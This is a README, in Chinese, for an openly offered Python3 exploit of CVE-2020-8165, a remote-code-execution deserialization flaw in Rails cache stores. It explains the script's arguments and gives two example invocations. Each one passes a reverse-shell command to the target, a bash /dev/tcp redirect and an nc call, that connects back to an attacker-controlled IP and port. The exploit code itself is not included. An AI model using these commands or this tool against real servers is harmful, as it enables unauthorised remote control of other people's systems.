CVE-2020-8165 Python 漏洞利用
这是使用 Python3 利用 CVE-2020-8165 的代码。此利用代码适用于 Rails < 5.2.4.3 和 Rails < 6.0.3.1。该漏洞允许攻击者在 MemCacheStore 和 RedisCacheStore 中反序列化用户提供的对象。此利用代码使用 ArgParse,使用户能够非常简单利用此漏洞。
用法
此漏洞利用有五个参数:
- rHost - 远程目标主机 IP 地址
- rPort - 远程目标主机上 Rails 运行的端口号
- email - 用于登录服务的邮箱
- password - 登录服务账户的密码
- cmd - 要执行的命令,需用引号括起以处理空格
示例:
- python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
- python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"
主要致谢
原始 CVE 详情:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165
我修改并添加了 arg parse 的 Pastebin 利用代码:https://pastebin.com/jpHpdBTk